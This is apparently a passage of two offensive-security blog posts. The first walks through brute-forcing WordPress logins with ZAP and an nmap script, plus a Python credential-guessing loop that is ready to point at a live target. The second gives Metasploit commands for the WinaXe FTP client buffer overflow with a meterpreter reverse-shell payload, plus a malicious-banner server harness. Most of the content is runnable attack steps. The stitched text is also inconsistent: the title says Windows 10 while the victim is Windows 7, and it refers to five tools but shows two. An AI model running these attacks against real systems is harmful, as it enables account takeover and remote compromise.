ZAP captures the login request. As you can see, I logged in with user as the username and password as the password, and both values appear in the Request section of the tool. Select the value you entered in the form that you want to fuzz; I select only the password value, then right-click and choose Fuzz.

When you click Fuzz, a new Fuzzer window opens. Click the Add button on the left of the frame to open the Add Payload window, click Select and choose your dictionary for the attack.

Click Add again, then click Start Fuzzer.

After starting, a new screen opens. Click Options, choose the Depth first radio button for the payload replacement strategy, tick the Follow redirects check box and click Start Fuzzer.

When the attack has finished, you can spot the valid credential by checking the State and Size Resp. Header columns: the successful login differs from the rest of the combinations.

From the result, bitnami is the password for the login user.

Brute force attack using Nmap

This script performs brute-force password auditing against WordPress installations. It uses the unpwdb and brute libraries to perform password guessing, and any successful guesses are stored using the credentials library.

Open a Kali terminal and type the following Nmap command:

nmap -sV --script http-wordpress-brute --script-args 'userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.17

Here http-wordpress-brute.hostname sets the Host header for virtual hosting (replace domain.com with the target's virtual host name, or drop the argument when the site is served by IP), http-wordpress-brute.threads is the number of parallel guesses, and brute.firstonly stops the script after the first valid credential is found.
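All five tools above do the same thing: POST username/password pairs to wp-login.php and tell success from failure by the response. The script below is an added example written for this page, not code from any of those tools, that makes the request format and the success check explicit. The network call is replaced by a constructed fake WordPress (`fake_wp_login`) whose only valid credential is user:bitnami, so the loop runs offline; the target URL and wordlists are assumptions.

```python
"""Added example (not from the post or from Burp/wpscan/Metasploit/ZAP/nmap):
the wp-login.php guessing loop those tools implement, with the transport
swapped for a constructed fake server so it runs offline. To run it against
a lab target, replace fake_wp_login with a requests.post() call that returns
(status_code, headers, text)."""
from urllib.parse import urlencode, parse_qs

# Constructed lab target: a Bitnami-style WordPress whose only valid
# credential is user:bitnami, the pair the post recovers.
VALID_CREDS = {"user": "bitnami"}


def build_login_request(base_url, username, password):
    """Return (url, headers, body) for the POST WordPress expects. The form
    fields are the ones wp-login.php reads; without the test cookie
    WordPress rejects the login before checking the password."""
    body = urlencode({
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": base_url + "/wp-admin/",
        "testcookie": "1",
    })
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "wordpress_test_cookie=WP+Cookie+check",
    }
    return base_url + "/wp-login.php", headers, body


def fake_wp_login(url, headers, body):
    """Constructed stand-in for the server, mimicking WordPress's two visible
    outcomes: a 302 to wp-admin with a wordpress_logged_in_* cookie on
    success, or a 200 re-rendering the form with a login_error div."""
    form = parse_qs(body)
    user = form.get("log", [""])[0]
    pwd = form.get("pwd", [""])[0]
    if VALID_CREDS.get(user) == pwd:
        return 302, {"Location": "/wp-admin/",
                     "Set-Cookie": "wordpress_logged_in_abc=...; HttpOnly"}, ""
    return 200, {}, '<div id="login_error">ERROR: Incorrect username or password.</div>'


def login_succeeded(status, headers, text):
    """Success check: rely on the redirect plus session cookie, not on the
    response length alone, since the length varies with the username echoed
    back into the error page (this is what the Status/Length columns in
    Burp and ZAP are showing you)."""
    return status in (301, 302) and "wordpress_logged_in" in headers.get("Set-Cookie", "")


def brute_force(base_url, usernames, passwords, send=fake_wp_login, first_only=True):
    """Try every username x password pair (Burp's cluster bomb). Returns the
    list of (username, password) that logged in and the number of requests
    sent. first_only mirrors nmap's brute.firstonly=true."""
    found = []
    attempts = 0
    for user in usernames:
        for pwd in passwords:
            attempts += 1
            status, hdrs, text = send(*build_login_request(base_url, user, pwd))
            if login_succeeded(status, hdrs, text):
                found.append((user, pwd))
                if first_only:
                    return found, attempts
                break  # one valid password per user is enough
    return found, attempts


if __name__ == "__main__":
    # Constructed wordlists standing in for user.txt and pass.txt.
    creds, n = brute_force("http://192.168.1.14", ["admin", "user"],
                           ["admin", "password", "bitnami"])
    print("valid:", creds, "after", n, "requests")
```

Two practical notes. The check on the redirect and the wordpress_logged_in cookie is what distinguishes a real login from a 200 that merely looks different in length. And each failed guess here is a full request; on a real target, login rate limiting, a WAF, or fail2ban watching the access log will throttle or block this loop long before a large wordlist is exhausted, which is why wordlist quality matters more than speed.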

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 5 ways to Brute Force Attack on WordPress Website appeared first on Hacking Articles.

Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow


This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.

Exploit Targets

WinaXe 7.7 FTP client

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole.

Now type use exploit/windows/ftp/winaxe_server_ready

msf exploit(winaxe_server_ready) > set lhost 192.168.0.106

msf exploit(winaxe_server_ready) > set srvhost 192.168.0.106

msf exploit(winaxe_server_ready) > set payload windows/meterpreter/reverse_tcp

msf exploit(winaxe_server_ready) > exploit

Now get the victim to connect to the attacker's address with the WinaXe FTP client: when the victim enters the connection details and the client waits for the FTP Server Ready response, the malicious banner triggers the overflow and you get a meterpreter session.
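The trigger condition is a client that connects and blindly reads the 220 "Server Ready" greeting. The harness below is an added example, not the Metasploit module, that reproduces only that condition: a one-shot FTP listener answering with an oversized banner, plus the client-side read an FTP client performs before sending USER. The overflow offset and payload are not on this page and are not shown; the 5000-byte filler is a placeholder you would vary while watching the client under a debugger.

```python
"""Added example (not the Metasploit winaxe_server_ready module): a minimal
stand-in FTP server that serves an oversized 220 banner, the condition the
post describes, and the client-side read of that banner. Banner length and
filler are constructed placeholders for a crash-reproduction session."""
import socket
import threading


def build_server_ready_banner(length, filler=b"A"):
    """A syntactically valid FTP 220 reply whose text is `length` bytes.
    FTP replies are '<code><space><text>\\r\\n'; a client that copies the
    text into a fixed-size buffer without checking the length is the bug
    class the post's module exploits."""
    return b"220 " + filler * length + b"\r\n"


def serve_banner_once(bind_host, bind_port, banner):
    """Listen, hand the banner to the first client that connects, then
    close. Returns the bound port (pass 0 to let the OS pick one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, bind_port))
    srv.listen(1)
    port = srv.getsockname()[1]

    def _run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=_run, daemon=True).start()
    return port


def read_banner(host, port, limit=1 << 20, timeout=5.0):
    """Client side: connect and read the greeting up to CRLF, as an FTP
    client does before sending USER. `limit` caps the read so a hostile
    server cannot make this helper itself grow without bound."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as c:
        while not buf.endswith(b"\r\n") and len(buf) < limit:
            chunk = c.recv(65536)
            if not chunk:
                break
            buf += chunk
    return buf


if __name__ == "__main__":
    # Constructed run on localhost: serve a 5000-byte banner and read it back.
    p = serve_banner_once("127.0.0.1", 0, build_server_ready_banner(5000))
    reply = read_banner("127.0.0.1", p)
    print("got %d bytes, starts %r" % (len(reply), reply[:8]))
```

To use this against the real client, bind to the attacker's address on port 21 and point WinaXe at it, as with srvhost in the module; the read_banner() helper shows the same greeting read from the other side so you can confirm the listener is serving what you think before involving the target.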

The post Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow appeared first on Hacking Articles.
